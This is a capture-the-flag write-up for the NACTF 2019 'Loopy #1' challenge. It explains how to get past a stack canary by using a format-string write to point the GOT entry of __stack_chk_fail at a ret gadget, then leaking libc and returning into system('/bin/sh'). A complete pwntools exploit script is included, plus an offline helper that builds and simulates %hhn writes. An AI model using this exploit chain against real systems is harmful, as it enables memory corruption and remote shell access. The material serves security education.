Loopy #1
Binary Exploitation - Points: 500
Same program as Loopy #0, but someone’s turned on the stack protector now!
Connect at
nc shell.2019.nactf.com 31732
Compared to the previous challenge, stack canaries are now enabled: before vuln returns, the saved canary is compared against the reference value and __stack_chk_fail is called on a mismatch, so the plain return-address overwrite from Loopy #0 would abort the program before our ROP chain runs. __stack_chk_fail is an imported function resolved through the GOT, and the format string bug gives us an arbitrary write, so we first use it to overwrite the GOT entry of __stack_chk_fail with the address of a ret gadget. When the corrupted canary is detected, the call goes to the gadget, which returns straight back into the instructions after the call, and execution continues through the normal epilogue as if the check had passed. This depends on two things worth verifying in the binary: the GOT must be writable (no Full RELRO, which checksec will show), and the instruction after call __stack_chk_fail@plt in vuln must be the function's own epilogue; if the compiler had moved the call out of line, returning from the gadget would land somewhere else.
The rest is identical to the previous challenge: leak the libc address of printf through its GOT entry with %7$s, compute the libc base, and return into system("/bin/sh").
from pwn import *

# Offsets inside the provided libc (the server's libc.so.6).
libc = ELF('libc.so.6')
libc_printf = libc.symbols['printf']
libc_system = libc.symbols['system']
libc_binsh = next(libc.search(b'/bin/sh'))

e = ELF('loopy-1')
context.binary = e
vuln = e.symbols['vuln']
stack_chk_fail_got = e.got['__stack_chk_fail']
printf_got = e.got['printf']

# Any 'ret' instruction will do: __stack_chk_fail gets redirected to it.
r = ROP(e)
ret = r.find_gadget(['ret']).address

# Stack layout of vuln: 64-byte buffer, then 16 bytes (canary, padding,
# saved ebp), then the return address.
BUF = 64
TO_RET = BUF + 16

# p = remote('shell.2019.nactf.com', 31732)   # port from the challenge text
p = process('./loopy-1')

# 1. Format string write: GOT[__stack_chk_fail] = ret gadget.  The padding
#    clobbers the canary, but the failing check now just returns into the
#    epilogue, so we can already return into vuln again.
print(p.recvuntil(b'>'))
fmt = fmtstr_payload(7, {stack_chk_fail_got: ret})
payload = fmt.ljust(BUF, b'A') + b'A' * 16 + p32(vuln)
p.sendline(payload)

# 2. Leak printf's libc address: the GOT address at the start of the buffer
#    is printf argument 7, so %7$s prints the pointer stored there.
print(p.recvuntil(b'>'))
payload = (p32(printf_got) + b'%7$s').ljust(BUF, b'A') + b'A' * 16 + p32(vuln)
p.sendline(payload)
print(p.recvuntil(b'You typed: '))
p.recv(4)                       # the 4 address bytes are echoed back first
leak = u32(p.recv(4))           # then the 4 bytes of the libc pointer
log.info('leak: ' + hex(leak))

libc_base = leak - libc_printf
system = libc_base + libc_system
shell = libc_base + libc_binsh
log.info('system @ ' + hex(system))
log.info('shell @ ' + hex(shell))

# 3. Classic 32-bit ret2libc: return address -> system, fake return
#    address, pointer to "/bin/sh".  The canary check no longer matters.
print(p.recvuntil(b'>'))
payload = b'A' * TO_RET + p32(system) + p32(0) + p32(shell)
p.sendline(payload)
p.interactive()
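The script leaves the construction of the GOT overwrite to fmtstr_payload. The following is an added example, not part of the original writeup or of pwntools, that builds the same kind of byte-wise %hhn write by hand and checks it offline against a toy model of printf's output counting. The argument offset 7 and the 64-byte buffer are taken from the exploit above; the GOT slot and gadget addresses are hypothetical placeholders, and simulate_printf only understands the three directive kinds the payload uses (literal bytes, %<width>c and %<pos>$hhn).

```python
import re
import struct


def build_fmt_write(addr, value, offset, written=0):
    """Format string that writes the 32-bit `value` to `addr` one byte at a
    time with %hhn, like fmtstr_payload(write_size='byte').  `offset` is the
    printf argument index at which the first dword of our buffer appears
    (7 for loopy-1); `written` is what printf printed before our string."""
    # The four target addresses come first: they are arguments offset..offset+3.
    addrs = b''.join(struct.pack('<I', addr + i) for i in range(4))
    fmt = b''
    count = written + len(addrs)      # the addresses themselves get printed
    for i in range(4):
        byte = (value >> (8 * i)) & 0xff
        # %hhn stores the low byte of the output count, so pad with %<n>c
        # until count % 256 == byte.  Wrapping keeps every step under 256 chars.
        pad = (byte - count) % 256
        if pad:
            fmt += b'%%%dc' % pad
            count += pad
        fmt += b'%%%d$hhn' % (offset + i)
    return addrs + fmt


def simulate_printf(fmt, args, memory, written=0):
    """Toy model of printf for literal bytes, '%<width>c' and '%<pos>$hhn'.
    `args` maps argument index -> dword as seen on the stack, `memory`
    collects the bytes that %hhn stores.  Returns the final output count."""
    count = written
    i = 0
    while i < len(fmt):
        if fmt[i:i + 1] != b'%':
            count += 1
            i += 1
            continue
        m = re.match(rb'%(\d*)(\$?)(hhn|c)', fmt[i:])
        if not m:
            raise ValueError('unsupported directive at offset %d' % i)
        num, dollar, conv = m.groups()
        if conv == b'c':                      # prints max(width, 1) characters
            count += max(int(num or b'1'), 1)
        elif dollar:                          # store low byte of count at *arg
            memory[args[int(num)]] = count & 0xff
        else:
            raise ValueError('only positional %hhn is modelled')
        i += m.end()
    return count


def args_from_buffer(buf, offset):
    """The buffer lives on the stack, so its dwords are what printf finds at
    argument positions offset, offset+1, ... (the same fact %7$s relies on)."""
    return {offset + k: struct.unpack('<I', buf[4 * k:4 * k + 4])[0]
            for k in range(len(buf) // 4)}


# Hypothetical addresses, not taken from the binary: the GOT slot of
# __stack_chk_fail and a 'ret' gadget.
GOT_STACK_CHK_FAIL = 0x0804a020
RET_GADGET = 0x08048506
BUF_SIZE = 64       # bytes from the start of the buffer to the canary in loopy-1


def demo(got=GOT_STACK_CHK_FAIL, gadget=RET_GADGET, offset=7):
    """Build the write, run it through the model and return the dword that
    ended up in the GOT slot together with the payload length."""
    payload = build_fmt_write(got, gadget, offset)
    if len(payload) > BUF_SIZE:
        raise ValueError('payload does not fit in the buffer')
    memory = {}
    simulate_printf(payload, args_from_buffer(payload, offset), memory)
    stored = bytes(memory[got + k] for k in range(4))
    return struct.unpack('<I', stored)[0], len(payload)


if __name__ == '__main__':
    value, length = demo()
    print('payload is %d bytes, GOT slot now holds 0x%08x' % (length, value))
```

For the placeholder addresses the payload is 59 bytes, so it fits in the 64-byte buffer with room for the padding the exploit appends. Note that an address containing 0x25 ('%') would be parsed as a directive by the real printf, which is one of the reasons pwntools can also place the addresses after the format text.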